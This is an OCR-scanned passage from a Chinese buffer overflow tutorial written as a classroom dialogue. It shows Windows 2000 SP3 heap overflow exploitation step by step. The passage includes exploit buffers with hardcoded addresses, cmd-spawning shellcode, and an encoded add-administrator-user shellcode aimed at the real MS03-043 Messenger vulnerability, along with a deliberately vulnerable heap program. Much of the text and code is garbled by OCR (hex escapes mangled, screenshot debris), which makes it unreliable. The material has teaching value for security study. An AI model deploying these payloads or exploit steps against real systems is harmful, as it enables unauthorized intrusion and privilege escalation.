行 。 在 VC 环境 下 ， 设 置 程序 的 参数 步骤 如 下 : 先 点 击 ' 工 程 一 设置 ' (图 4 一 28) 。” 
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^. Fin ‚ FindCallEsi - ARES ш 

























































а sua: a 设置 活动 工程 
gs h 42 


bas +] mis. s 


| gs x ! EEUU sz 
划 xl Hinclu MEM. ЕЕ 


affini] "inclu `җатжатїнх.. 


int ma 


i 














arqu) 


bool we loaded it - False; 
HINSTRNCE h; 
TCHAR dllname[] = "User32''; 
if(argc»1) 
1 
strcpy(dllname,arqu[1]); 
, 
h = GetHoduleHandle(dllname); 
if(h == NULL) 
t 
h = LoadLibrary(dllname); 
if(h == HULL) 
1 
caut««" "ERROR LOADING DLL: "««&dllname&«&endl; 
return 1; 


JliFindCallEsi.exe - 8 error(s), B varning(s) 


| М 编译 CUm X EHE 1 у= БУ 2] <| | 
“然后 在 工程 设置 对 话 框 中 选择 eod 在 ‘程序 变量 ' 一 栏 填 写 要 查找 的 dll 名 称 ， 这 里 我 们 
还 是 填 成 user32.dl| (图 4 一 29) 。 




















Project Settings Е Ё 3] x] 
Settings For: [Win32 Debug -| General Debug | CIC++ | Link | Resources | Bi 
ESS FindCallEsi š - | 

Category: | ЛИЛИНИН - | 





可 要 行 调试 对 话 : 





EA— HERS ENTRE TESEADebuglFindCallEsi.exe Е 
W 工作 目录 : 


I ——— 
U 程序 变量 : 

user) C í í 
N 远程 可 执行 路 径 和 文件 名 : 


TT 


ar | 


“设置 好 后 ， 编 译 、 运 行 ， 我 们 可 以 看 到 ， 在 user32.dll 中 找到 了 一 个 ， 地 址 是 0x77e2f91f。 如 
图 4 一 30。 " 





+. FindCallEsi - 章 | 天 中 玄 wC++- [FindCallEsi.cpp] EBD — 二 | 可 | xl 
ll E x te=- c. [mms wk lw 
|[Сюһа) zJ [АП global members [emin WS ` 

S p ® + E © ||fFindCalEsi v]|win32Debug ӘК t [йт 


= al xl ttinclude&iostream.h? 
Hinclude<windous.h> 
int main(int argc, char жє арди) 


1 






F 

















bool we_loaded_it = false; 
HINSTANCE h; 
TCHAR dllname[] = “User32"™"s 
if(argc?1) 
1 

strcpyuiídllname,arqu[1]); 


[END OF lser32 MEMORY REACHED 


h = GetHoduleHandle(dllname); Press any key to continue, 
if(h == NULL} 
i 





h = LoadLibrary(dllname); 
if(h == NULL) 


Cout««"ERROR LOADING DLL: "4&&dllnames&enidl; 
return 1; + 
"| 


ZliFindCallEsi.exe - B error(s), B warning(s) 


[оаа еф 





“Ik ! 这 下 可 以 得 到 构造 字符 串 的 示意 图 了 。 "同学 们 画 下 了 图 4 一 31。 


ч 


egl+0x4C 


5hellC ode 





“ 吧 ， 下 面 我 们 就 按照 这 个 图 构造 出 数组 'mybuf， 以 实现 覆盖 ， 如 下 : "老病 说 道 。 


NJ 


char mybuf[450] - 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
" NAX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
" NAX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
" NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
"NAX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90". //. 
"NXebNX12NX90NX90NX90NX90NXx90Nx90". //V8 字 节 扒 管理 结构 ，eb 12 跳 过 what 和 where 
"\x1f\xf9\xe2\x77" // 覆 盖 what，call[esi+0x4c] 在 user32 中 的 地 址 
"NX4CNX04NxecNx77" //2Sibwhere, TOP SEH 在 2000 中 文 SP3 的 地 址 
// 下 面 是 win2000 SP3 下 开 DOS 窗 口 的 ShellCode， 参 看 第 二 章 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NXBBNX8BNXECNX33NXCONX5ONXBONXBONXCOGNXABNXFANXADNXCGNXABNXFBNX53" 
"NXC6NXA45NXF6NX56NXCO6NXABNXF7NXAS3NXC6NXA45NXF8NX52NXCO6NX4BNXF9NX5BANXCGNXABNXFANX2ENXCO' 
"NXABNXFBNXA44ANXC6NXABNXFCNXACNXC6NXA45NXFDNXACNXBA" 
"NX64NX9f NXE6Nx77". //SP3 loadlibraryithibox77e69f64 
"NXB2NX8DNXA4BNXFANX5BO" 
"NXFFNX55NXFOQ" 
"NXBBNX8BNXECNX83NXECNX2CNXB8NX63NX6FNX6DNX6DNX89NX45NXFANXB8NX61NXGENX64NX2E" 
"NX89NX45NXF8NXB8NX63NX6FNX6DNX22NX89NXA45NXFCNX33NXD2NX88NXBBNXFFNX8DNXA45NXFA" 
"\x50\xB8" 
"\xc3\xaf\x01\x78" //SP3 system 地 址 909x7801afc3 
"AXFFNXDO" ; 


“大 家 注意 ， 我 们 找 的 call [esi+0x4C] 的 指令 地 址 是 在 user32.dll 里 面 ， 所 以 要 先 
LoadLibrary(“user327)， 以 保证 加 载 了 user32.dll 动 态 链接 库 ， 具 体 利 用 程序 参看 
vul1Callesi.c (光盘 有 收录 ) 。 编 译 、 执 行 ， 还 是 弹出 了 一 个 DOS 对 话 框 ! 如 图 4 一 32。” 








vullCallesi - Б ҮС++ - [vuli Callesi.c] BENE _|@| xl 
|D ze S8 查看 EU 工程 编译 工具 Driverstudo 窗口 帮助 іа xi 
als Bəs |+ ç [m P 8 Sa [copy ~ [С 
itera] 本 wm [анай = z 

ОЮ ! E A |ancanesi r|Win32 Release — ӘМ t [ub | 


= a xi "AX9 0X9 0Nx9 0x9 0X9 ONx 9 OX x9 V x9 Nx 9 OV x9 0" 








"Ax9 0x9 03x 9 0x9 0x9 0x 9 0x 9 0x9 0x 9 0x 9 B 

хов хо вхо 9x9 0x9 0x9 0x90x90x90x9 Bg' 

"№9 0\9 DXX9UXXODVXOBDNXODNX9UNx90Nx90x90" // Е [E] C 2002 51 Te buf1 

"AxebXx123x9 x9 Bx9 x9 0x9 9x9 B /78 宇 节 推 管理 结构 ，eb 120635 whati[ where 
UAXxTFAxFOXxp2Xx77' fi 牙关 what，call[esi+8x4c] 在 user32 中 的 地 址 
UAXAHCAXBANXPECXXZ7'" //7Ezhuwhere, ТОР SEH 在 2888 中 如 sp3 的 地 址 


ff 下 面 是 win2888 sp3 下 的 开 dos 窗 口 的 ShellCode， 戎 看 第 二 章 


UNXEOBAXxXOBSxOBx9gBx908x90]03x903x9B83x9Bx9Bx9 B" 


"UAxXS5AXBBXXELXXI3XUCBDSNx570x58x58VxC6Xx B 5XxFAONXADXVCOSxH5NxF5x53** 
UXAXDOXXEUSXNXFG6Xx56NXDONXxI5XxXF7XXI3SXXDCONxXNSXXFBSVXxX52XxD6Nxl5XxF0SNX55SxXCONX NS XxXxFARNRZEXXE 
"AxHSXXxFBXxSMNxC6NXXxISNxXFDNSXhCNxXCóNxS5NxFDXXxACNxBA" 


"Ax68XAX9FAXEÓNX77"' //Sp3 loadlibraryjihi dx77e69F65 
UNAXS2XXBDAXHBXXE BR B" Command Prompt 

"AXFFXXxX55XxF O" oofteRy Windowus DOSO —. 
UAXBSAXBBXXECXXBONRECNX2CNXBBSVXÓO Ми ТС PSPP IE ШЕ EEEE 
“\х89\хН5\хЕВ\ХхВВ\х6З\ х6Е\ х6) \ х2 MAN EM PRESE 

"A x5 QV xBB'"' JR [Ex | ы LNS RELERBRSE> __ 
UXXCJXMXaFAxD1x78" //sp3 sy 


UXAXFFXXDB; 





int main fint arnr rhar xarnnur 1 


“也 成 功 了 ! "大 家 都 非常 高 六。 





“好 ， 明 白 了 堆 洽 出 利用 的 原理 ， 我 们 来 尝试 一 个 真正 的 漏洞 吧 1 ” 





m H Dogs H 


3 5| — —Message?E s HA 3s 78] ^J RU FB 


“我 们 来 看 一 个 现实 中 真正 的 堆 浴 出 漏洞 一 一 Windows Message 堆 浴 出 漏洞 。 其 漏洞 公告 
М503 — 043184 — 33. "< 36,38, “大 家 先 仔细 看 看 。 





J Nicraoszsoft AAA NSD3-D43 一 Nicrosoft Internet Explorer EJ | 
AR) dm) mo) ЕШ IA Rh QD ДЕ 


Qss- O- |) | @ Гая ув qnas O Ga- Ше И 


Hr (n) Я | http://www. пі erosa t. con сапа secari ty/Bulletinz/MS03-043. атр w EJ ea ы + 上 网 助手 kJ ы e (83 3288: 431 





| Microsoft Security 主页 Microsof TEZA | 订阅 先 费 突 全 性 更 新 贞 子 期 刊 | Security AAA 
жытту А ЮЕ 
| Microsoft REA Microsoft 安全 公告 MS03-043 
Ета k 
ZEB ; А5 03-0603: Messenger ЖЖЖ sP бй SF Ie Pr AE АН ГДЕ RO F Ak FEFCER (тойа) 
最 侍 经 验方 法 ЖЕНЕ: 2003 年 10 月 15 目 
| TechNet FEHER A k 版 本 号 :10 
ЕУ 








Бае ЧАЛА дА 

үй бае RARES: US : 
信 你 的 PC 受到 保护 。 PR : ФРЕГАТЕ МЕЕ. 
É+ EF А : = 
TARH: 2. 
Sr x BGLIEPE FERME SEHER НЕ FEL CER : 

EGET : 

= Micrasaft Windows NT Vorkstalion 4 D, Service Pack Ba - 修补 程 

їїсгозай windows NT Server 4.0, Service Pack Ба- ТЕНЕ 
Місгозоћ Vindows NT Server 4.0, Sm IR SR AR, Service Pack В - 下 载 候 外 程序 
һїсгоай Windows 2000, Service Pack 2 - 下 载 修 补 程 压 
Microsoft windows 2000, Service Pack 3, Service Pack 4 - ТЖ ЙЕЗЕ ЕЕ 
Microsol windows XP Gold, Service Pack 1 - Т КЕКЕНЕ 
hicrasaft Windows XP &3-bit Edition - TETE HEE 
Microso Windows XP B3-bit Edition version 2003 - 下 载 健 补 程 序 
Місго2ой windows Server 2003 - FEES HIT 

= Microsoft Windows Server 2003 64-bit Edition - ТЖ ЕЕЕ КЕ 
TERRAE : 


= сос Windows Millerrdum 


E ЕЛЕЕ TEMA. СААТ РЕ ЕДЕ s LR Baap]. ААА Т ЕЕ, ИПИЕ ТИП RT EGRE 
EESTI 
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4.3.1 ЖШ ra BOE fu 


"Messenger 服务 是 一 个 Windows 服务 ， 它 传送 net send 消息 。 在 CMD 控 制 台 Т — 
net send 对 方 计算 机 名 消息 ， 对 方 融会 弹出 一 个 信使 服务 对 话 框 ， 显 示 我 们 传递 给 它 的 消息 
内 容 。 如 图 图 4 一 34。 


“ 哦 ， 这 种 消息 传送 的 方法 ， 比 不 上 QQ、MSN， 有 什么 用 呢 ? "大 家 问 道 。 


“Windows Message 服 务 除 了 用 于 用 户 间 发 送 消 息 、 管 理 员 向 用 户 发 送 管 理 警 报 外 ， 也 可 用 作 
事件 通知 ， 上 比如 当 打 印 作 业 完 成 或 计算 机 断 电 而 切换 到 UPS 时 ， 目 动 使 用 Message 通 知 用 
Pe” 

“ 哦 ， 原 来 可 以 和 其 他 程序 联动 啊 1”" 大 家 都 明白 了 。 


NE - — -elxl| 


С:Опеє ѕепа $С0-139401К616С 19830 
НВ DEIA F| SCcU-I394UIK616C。 








从 SCU-T394VIK816C 到 2004-11-9 14:02:07 上 SCU-T394VIK616C 的 消息 
тк0630 





П 1 
“是 的 。 我 们 从 图 3 一 34 的 信使 服务 对 话 框 中 可 以 看 出 ， 传 送 的 Message 包 括 发 送 方 计 算 机 
名 、 接 收 方 计算 机 名 、 时 间 和 消息 。” 


“人 确切 的 说 ，Message 数 据 包 的 结构 如 图 4 一 35。 它 是 通过 NetBIOS (80137 — 1399mL1sXUDP 
Н#0135%ш Г) 传输 的 。 


Nessage 结 构 








ав 时 间 | 机 器 名 Mus 








“有 了 Message 结 构 和 前 面 网 络 编程 的 基础 ， 我 们 完全 可 写 出 一 个 程序 来 完成 net send ES 1} 
送 消息 的 功能 。" 老 证 说 道 , “但 我 们 要 更 进一步 ， 不 仅 要 能 正 前 传送 ， 还 要 使 其 浴 出 1 


Q 有 版 缓冲 区 浴 出 教程 


“ 哦 ?是 哪 部 分 发 生 了 浴 出 呢 ? 时 间 部 分 ?还 是 机 器 名 部 分 ?大 家 和 猜测 道 。 


呵呵， 微软 的 公告 上 都 说 了 了， 导致 该 漏洞 的 原因 是 : 没有 正确 的 验证 长 度 束 把 消息 传递 给 组 
冲 区 了 。 所 以 消息 部 分 过 长 后 ， 就 可 以 导致 堆 浴 出 1” 


28, жю!” 

"ВАА TAHIRA, RNAAR — ЛЕК, S Rs A ABS T (或 者 利用 前 面 
的 方法 ) EDAN "老病 在 黑板 上 男 了 起 来 ,， “我们 可 以 得 到 : 是 消息 的 2263 个 字 节 达到 了 
一 个 堆 管 理 结 构 ， 接 下 来 束 是 两 个 要 改 于 的 操作 指针 ， 如 图 4 一 36。 

esit+Ox4C 








“ 哦 ! 和 前 面 的 堆 浴 出 分 析 果 然 一 模 一 样 啊 1 ”同学 们 感叹 道 。 
“是 的 ， 我 们 继续 按照 经 典 的 三 步 走 ， 完 成 攻击 。” 
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4.3.2 38 FH TU 28 28 ShellCode4] $8 fi 
“定位 了 洽 出 点 ， 下 一 步 融 是 ShellCode 的 编写 。 


“前 几 次 课 ， 我 们 对 ShellCode 的 编写 进行 了 详细 讲解 ， 这 里 就 使 用 现成 的 添加 用 户 的 
ShellCode 吧 ! 功能 是 添加 一 个 名 为 X' 的 用 户 ， 并 加 入 到 管理 组 中 。” 


unsigned char ShellCode[] = // XorDecode 

"NXEBNX10NX5ANXAANX33NXC9NX66NXBO9NXSENXO1NX80NX34NXOANX96NXE2NXFA" 
"NXEBNXOBNXE8NXEBNXFFNXFFNXFEF" 

// AddUser:X Pass:X 

"NXTfONX17NX7aNX16NX96NXATf NX7/ONX7eGNX21NX96NX96NX96NXAf NX90NXAfT Nx55" 
"NXCbBNXfeNxe8Nx4e Nx 7 ANXebBNx7eNxX2bNX96NXx96Nx96Nx1f NxdONx9aNxc5bNxfe" 
"NX18Nxd8Nx98Nx7aNx7eNXx39NX96NX96Nx96Nx1f NxdONx9eNxa7 NxA4dNxc5Nxfe" 
"NxeeNxff NxabNxaANXfeNxXf8NXf3Nxe2NXf 7NXC2NX69NX46NxAf NxdONx92NxAf " 
"NXBBAXCBNXfeNxXcC8Nx49NxeaNxbbNx7eNxdiaNXx96Nx96Nx96Nx1f NxdONXx86Nxc5" 
"NxfeNxAd1NxabNx9aNx5bBNx7eNxe8NXx96NX96NX96Nx1f NxdONx82Nxa7Nxb6Nxa 7" 
"Nx4dNxd5bNxce6NxfeNxeANX96NXe5NX96NXxfeNxe2NX96NXf9Nx96NxfeNxeANx96" 
"NXT7NX96NXfeNxeBNx96Nxe2Nx96NxfeNxf8Nx96Nxf f Nx96NxfeNxfbNx96Nxff" 
"NX96NxfeNxd/7NXx96Nxf2Nx96NxAf NxfONx8aNxce6NxfeNxceNx96NXx96Nx96NxAf" 
"AXYZ7NXAf Nxd8Nx8eNxfeNx96NX96NXCaNX96NXC6NXCBNXCO6NXCO6NXCBNXCONXC 7" 
"NXCZNXATNX77NXC6NXC2NXC7NXCBNXC6NX69NXCONX86Nx1dNxd8Nx8eNxdfNxdf" 
"NXCZNXATNXYT/NXfCNX9O7NXC7NXf CNX95NX69NxeONx8aNxXf CcNX96NX69Nxc0Nx82" 
"NX69NxcONX9aNxcONxfCcNxaeNxcfNxf2NxidNx97Nx1dNxd6Nx9aNx1dNxee6eNx8a" 
"Nx3bNxidNxd6Nx9eNxc8NXx54NX92NX96NXCBNXC3NXcONxcdNxidNxfaNxb2Nx8e" 
"NxidNxd3NxaaNxdidNxc2Nx93NxeeNx97Nx7cNx1dNxdcNx8eNxidNxccNxbeNx97" 
"Ax7dNx75NxaANxdfNxidNxa2Nx1dNx97Nx78Nxa7 NX69Nx6aNxa7 NXb6Nx3aNxae" 
"NX76NXe2NX91NX57NXBONX9bNx97Nx5bA1Nx7dNx64NxadNxeaNxb2Nx82Nxe3Nx77" 
"Nx1dNxccNxb2Nx97Nx7dNxfONxidNx9aNxddNxidNxccNx8aNx9 7 Nx7dNxidNx92" 
"Nx1dNx97Nx7eNx7dNx94ANxa7 NXb6NXATNX7CNXC9NXc8NXxcbNxcdNx5bANXx9eNx96" ; 


老病， 这 个 ShellCode 是 针对 哪个 系统 的 呢 ? " 台 下 有 人 问 道 。 

这 个 ShellCode 是 经 过 编码 变换 的 ， 而 且 采 用 动态 定位 的 方式 ， 各 个 系统 可 以 通用 。 
“编码 ?通用 ? 好 神奇 啊 1 这 是 怎么 实现 的 呢 ? "大 家 问 道 

“看 来 大 家 都 很 有 兴趣 ， 那 我 抽 个 时 间 给 给 你 们 讲 讲 ShellCode 的 编码 及 其 高 级 编程 吧 | ” 
“好 啊 1 ”大 家 欢呼 起 来 。 


“到 时 我 再 讲 具体 的 实现 吧 ! 现在 前 接 使 用 就 可 以 。” 老 病 说 遵 ，“ 我 们 还 是 先 完成 对 Windows 
2000 SP3 Message 扒 浴 出 漏洞 的 攻击 吧 l” 


Q 有 版 缓冲 区 浴 出 教程 


4.3.3 跳 转 和 构造 


“第 三 步 束 是 实现 跳 转 到 ShellCode 中 。" 老 病 说 ,，“ 现 在 ， 大 家 类 上 比 刚才 的 例子 想 想 ， 知 道 该 怎 
么 做 了 吧 ?” 


中， 在 消息 段 中 ， 先 覆盖 2263 个 无 用 字 节 进行 填充 ， 这 样 就 到 了 堆 管 理 块 ; 用 NOPNOPJmp 
08 履 盖 管 理 块 ， 用 来 跳 过 后 面 的 what 和 where， 然 后 进入 最 后 的 ShellCode 中 。” 古 风 说 。 


玉 波 也 抢 着 回答 : “Пп т паі рУ, calllesi+4C] 的 地 址 ， 把 where 覆 盖 成 默认 异常 处 理 地 
址 ， 后 面 跟 ShellCode， 就 像 图 4 一 37 一 样 。” 


esit0x4C 
Hà w 078 8 fe: 


еах есх 








“х ж, ТЕмһаі—мһегеВ Ent, 30 E Sr t 22 HE Hh lli EX call [еѕі+4с] 的 地 址 ; 发 
异常 后 ， 就 会 执行 call [esi 十 0x4C] ， 跳 转 到 堆 管 理 结构 中 ; 那儿 我 们 正好 放 的 是 JMP 08 
， 这 样 跳 进 最 后 的 ShellCcode 中 了 。 " 宇 强 也 把 流程 说 了 一 通 


“非常 好 1 "老师 很 满意 大 家 的 表现 ，“ 特 别 是 在 Windows2000 SP3 下 ， call [esi+4C] 指令 的 地 
址 是 0x77e2f91f， 顶 层 异 常 处 理 地 址 是 0x77ec044c， 这 是 我 们 在 前 面 得 到 的 。 这 样 ， 数 据 构 
造 融 如 图 4 一 38 所 示 。 


esl-0x4C 
构造 洲 出 消 朋 结构 : 








“好 了 1 "老病 说 道 ，“ 我 们 就 这 样 构造 出 了 消息 部 分 数据 ， 再 加 上 其 他 的 数据 头等 结构 ， 得 到 
程序 message.c。 我 们 把 数据 发 给 有 漏洞 的 目标 机 ， 目 标 机 就 会 跳 过 去 执行 我 们 的 
ShellCode, " 


“实际 测试 一 下 ， 我 们 先 在 ' 工 程 一 设置 ' 里 设置 要 攻击 的 主机 ， 如 图 4 一 39。 
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Project Settings I | : E |x| 


settings For: [Win32 Debug H 
x Es: 


General Debug | CIC44 | Link | Resources | Bi d] 


Category: (General "| 
BRUT US ios T: 








EAMsU3-(043MessageiMessagelDebugiMessage.exe |i 
W 工作 目录 : 

u 程 序 变量 

: 27.0.0.1| 


远程 可 执行 路 径 和 廊 件 名 : 





“ 绸 编译 、 执 行 。 目 标 机 上 融会 出 现 图 4 一 40 的 效果 。 


" Message - 创 天 中 





hal >> MA л р EET T a ER FAR 1 E - 
|D ze ma == 


laz ud! 


lam sS НГЕ 


—uUmuware së — 


ñSPHET Guest Р 
IVRM_WUWW-h931BEBE37  SQLDebugger pipi ET. 
X Hm NM 关机 是 由 NT AUTHORITYASYSTEN TIAR 


BD ice dii P TT УЛ, 


E: Ns HE 出 ЗТ VE NReleasednet user 


离 关 机 还 有 : 00:00:27 


I obs AE. 1 =. тет IH і 
TH [Hi УЧЕТ У |У *-Helease». 


ИТЕП: tema? тегті сет, exe 
нал 
HA. 


jn ‚ 状态 码 为 128. ЖЛЕ] 
新 启动 。 


if (sendto(s, packet, packet size, 8, (struct sockaddr *x)&addr, sizeof(addr) 
printf("error: unable to send раскеёҷп") ; 
return -1; 


Ў 


return B; 





“ 哦 1 B| T jx 1 "同学 们 叫 道 


“是 的 ， 那 是 Services 系 统 服务 异 单 后 引起 的 。 但 我 们 可 以 看 到 ， 已 经 加 上 了 一 个 名 为 XX' 的 用 
户 ， 完 成 了 我 们 想 要 的 功能 ! ” 


“是 啊 | 是 那 换 成 其 他 功能 的 ShellCode 也 可 以 么 ?” 


“当然 可 以 ， 只 要 那个 ShellCode 符 合 堆 漏洞 的 条 件 融 行 ， 大 家 下 去 可 以 目 己 测试 。 好 了 ， 我 
们 休息 一 下 | 


4.4 RtlFreeHeap 的 失误 


课 间 休息 时 大 家 议论 纷纷 。 
“缓冲 区 浴 出 有 如 此 多 的 方法 ， 真 奥妙 啊 1” 
“有 些 地 方 无 法 用 语言 表达 ， 只 能 自己 去 感受 1” 


“是 的 1” 老 病 说 道 ，“ 程 序 设 计 其 实 就 是 一 门 艺 术 ; 而 缓冲 区 浴 出 编程 ， 更 是 普通 程序 设计 之 
上 的 突破 与 创新 1” 


“不 过 说 到 程序 设计 艺术 啊 ! " 老 证 和 大 家 随便 的 聊 开 了 ,“ 强 烈 建 议 大 家 参与 ICPC/ACM (国际 
大 学 生 程 序 设计 竞赛 ) 。 该 赛事 极 大 的 维 炼 了 学 生 的 逻辑 分 析 能 力 、 策 略 制定 和 脑力 开发 !” 


小 知识 : ICPC/ACM (国际 大 学 生 程序 设计 竞赛 ) 


是 由 ACM (Association?for?Computing?Machinery， 美 国 计 算 机 协会 ) 组 织 的 年 度 性 竞赛 ， 
始 于 1970 年 ， 是 全 球 大 学 生计 算 机 程序 能 力 竞赛 活动 中 最 有 影响 的 一 项 赛事 。 竞 赛 方 式 是 在 
指定 时 间 和 地 点 ， 由 3 个 成 员 组 成 的 小 组 应 用 一 台 计 算 机 在 5 个 小 时 内 编程 解决 6 至 9 个 生活 中 
的 实际 问题 ， 现 场 提交 源 程 序 ， 上 自动 评判 是 否 通过 测 斌 数据， 按照 解决 问题 数目 的 多 少 和 耗 
时 排名 。 

老病 接着 说 : “ICPC/ACM 分 为 各 洲 的 预赛 和 美国 总 部 总 决赛 。 预 赛 的 第 一 名 或 前 两 名 队伍 会 
获得 去 美国 参加 世界 总 决赛 的 资格 。 总 决赛 的 地 点 前 两 年 在 夏威夷 ， 现 在 在 好 莱 坞 。” 


"BE ! 都 是 好 想 去 的 地 方 啊 ! "小 倩 说 道 。 


' 中 国 大 陆 2001 年 只 有 一 个 赛 点 一 上海 大 学 。 后 来 增加 了 一 个 ，2002 年 是 北京 清华 和 西安 交 
大 ，2003 年 是 北京 清华 和 中 山大 学 ， 今 年 2004 年 是 北京 大 学 和 上 海 交 大 。” 


“中 国 淮 最 强 呢 ? 清华 么 ? "古风 仰慕 的 问 道 。 


“实力 都 很 接近 。 但 上 海 交 大 代表 队 于 2002 年 获得 世界 总 决赛 冠军 ! 是 国内 唯一 的 一 次 冠 
# 1" JR SS El S°, 
"DE | 世界 冠军 啊 ! " 玉 波 的 嘴 都 张大 了 。 


“是 啊 ， 我 们 学 校 离 一 流 强 队 还 有 一 定 的 和 震 距 ， 未 来 融 在 你 们 身上 啊 ! 平时 可 供 练习 的 网 站 有 
浙江 大 学 (acm.zju.edu.cn) 、 四 川 大 学 (acm.scu.edu.cn) ， 里 面 有 大 量 题目 和 不 定期 的 比 


> L< Z< » 
AR S 7Jlbo 


“大 家 有 时 间 的 话 ， 多 参与 一 些 此 类 的 活动 吧 ! 打 好 算法 和 数据 结构 的 基础 ， 不 要 虚度 了 大 学 
四 年 的 时 光 啊 1” 


王强 听 了 老病 的 话 后 ， 内 心 激荡 不 已 .…… 


4.4.1 有 问题 的 程序 
“好 了 ， 我 们 继续 上 课 吧 1 ”老病 说 道 。 


“大 家 都 清楚 了 堆 浴 出 利用 的 实质 吧 ! 就 是 写 任 意 4 个 byte 的 数据 到 任意 的 内 存 地 址 中 ， 即 前 面 
强调 的 what 一 where。 除 了 刚才 再 分 配 时 ， 我 们 能 实现 what 一 where 外 ， 我 们 也 可 复 盖 已 分 配 
的 管理 结构 ， 使 它 在 释放 时 被 我 们 利用 1!” 


"B? xe np Ex ERU? 真是 想不到 ， 怎 么 利用 啊 ? ” |F] Se 4122 22 i9] 38, 


“看 来 大 家 兴趣 都 很 高 ， 不 错 ， 有 兴趣 才能 钻研 咏 ! 先 看 另 一 个 有 堆 浴 出 问题 的 程序 
heapvul2.cpp。 如 下 :” 


#include <string.h> 

#include <stdio.h> 

#include <windows.h> 

#include <malloc.h> 

int main (int argc, char *arov[]) 

{ 
HANDLE hHeap; 
char *buf1, *buf2; 
// 一 个 38 字 节 的 缓冲 区 
char mybuf[] = "11112222333344445555666677778888\x03\x00\x05\x00\x00\x09"; 
// 我 们 自己 建立 一 个 HEAP 
hHeap = HeapCreate(HEAP GENERATE EXCEPTIONS, 0x10000, Oxfffff); 
// 分 配 两 块 32 字 节 内 存 
buf1 = (char *)HeapAlloc(hHeap, 0, 32); 
buf2 = (char *)HeapAlloc(hHeap, 0, 32); 
// 382 № Ё)’ тури?’ я 211325 0 В), оиғ1' 8 
memcpy(bufi, mybuf, 32-6); 
// 释 放 内 存 
HeapFree(hHeap, ©, buf1); 
// 这 里 会 出 错 
HeapFree(hHeap, 0, buf2); 
return 0; 


“和 和 上面 那 个 heapvul2.cpp 程 序 不 一 样 ，" 老 病 说 道 ,“ 这 里 buf1=(char )HeapAlloc(hHeap, 0, 
32); 和 buf2=(char )HeapAlloc(hHeap, 0, 32); 一 来 就 动态 分 配 好 了 'buf1 和 'buf2' 的 空间 ， 如 
图 4 一 41。 


Buf1 ETERS 25 IB] 


Buf2 6977F fi& 22 |a] 





“然后 memcpy(buf1, mybuf, 32+6); 不是 把 'mybuf 效 组 拷贝 到 buf1 里。 拷贝 了 38 字 


节 ，‘buf1' 只 有 32 字 节 。 这 样 过 长 的 字符 串 找 给 ‘buf1'"， 不 仅 覆 蘑 了 其 32 字 节 的 空间 ， 还 窗 蔓 


了 'buf2' 的 管理 结构 ， 如 图 4 一 42。” 


+0 





“最 后 执行 HeapFree(hHeap, 0, buf2) 释放 ‘buf2’ 时 就 会 出 错 。” 老 师 说 道 。“ 我 们 测试 一 下 ， 编 


i. JR T ! 弹出 出 错 对 话 框 : “0x77fccfe8' 指 邻 应 用 的 '0x34343434' 内 存 ， 该 内 存 不 能 


为 "written ， 如 图 4 一 43。” 
'.. Free - Ж SC ++ - [Free.cpp] 
|Ë) 文件 SS 查看 插入 工程 编译 工具 Drverstudio шп #8 
19 = E > ga (| E с m p | GR [copy "| | ‘m 
[Globals] - ПАИ global members || Ф main JA LE UL 








IE ! E [Free + |Win32 Release ËP ЕЕЕ 
| ыы) | Ж#їпс1ийе <windous.h> | 








{Ей Fre Hinclude <mallüuc .H2> 


int main (int argc, char =argu[]) 
1 

HANDLE hHeap; 

char #bufi, *buf?2; 


пг авт 


/7 我 们 自己 建立 一 个 HEnP 





трт 
РРС "Ux77fccfea" 指令 引用 的 "0х34343434" EFE. ШЕН "written" s 
чаі _ 要 终止 程序 ， 请 单 击 "确定 "，。 
要 调试 程序 ， 请 单 击 " 职 消 ”。 





HeapFree(hHeap, 8, bufi); 


/1 这 里 会 出 错 
HeapFree(hHeap, 8, һи#2); 


return Я = 





char mygbuf[] = "111122223333454445555666677778888Xx BJXX 00X D5x OOV x DO x 09"; 


АСА 
BM 
J 


ОЛ zx HX G ДЕ 


4.4.2 Windows 堆 块 的 管理 结构 


"Hy ! 0x34343434 是 我 们 构造 的 数据 吧 ?" 大 家 高 兴 的 说 ,“ 那 我 们 又 可 以 控制 把 任意 东西 写 进 
任意 位 置 了 啊 ?” 


“是 啊 ， 但 为 什么 要 把 'Buf2’ 的 管理 结构 填 成 \xX03\x00\xX05\WxX00\x00\x09 这 么 奇怪 的 数 呢 ? " 宇 强 
义 发 现 了 问题 。 


“ 虽 ， 观 察 得 很 仔细 。 因 为 在 Windows 下 堆 管 理 有 很 多 分 文 ， 所 以 堆 的 浴 出 也 非 前 复杂 。 
Windows 系 统 在 作 释 放 处 理 时 ， 将 根据 堆 块 管理 结构 的 数据 来 进入 不 同 流程 的 处 理 。” 


“I | » 


“所 以 ， 如 果 我 们 想 要 在 Buf2 释 放 时 能 控制 what 和 where 的 值 ， 并 能 执行 what 一 where 的 操 
作 ， 那 束 需 要 精心 构造 (Buf2' 的 党 理 结构 1 


“ 堆 块 的 管理 结构 都 是 8 个 字 节 ， 每 个 字 节 的 含义 如 图 4 一 44。” 





“要 达到 我 们 的 上 目的， 产生 what 一 where 的 操作 ， 丈 需要 让 'Buf2' 的 管理 结构 满足 下 面 的 条 
ft. "É B 3. 


“第 一 ， 要 让 ' 索 引号 ' 段 的 值 小 于 0x40 ; 第 二 ， 要 让 'Flag' 的 第 0 位 和 第 三 位 都 置 1， 如 图 4 一 
45, " 
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Q 有 版 缓冲 区 浴 出 教程 





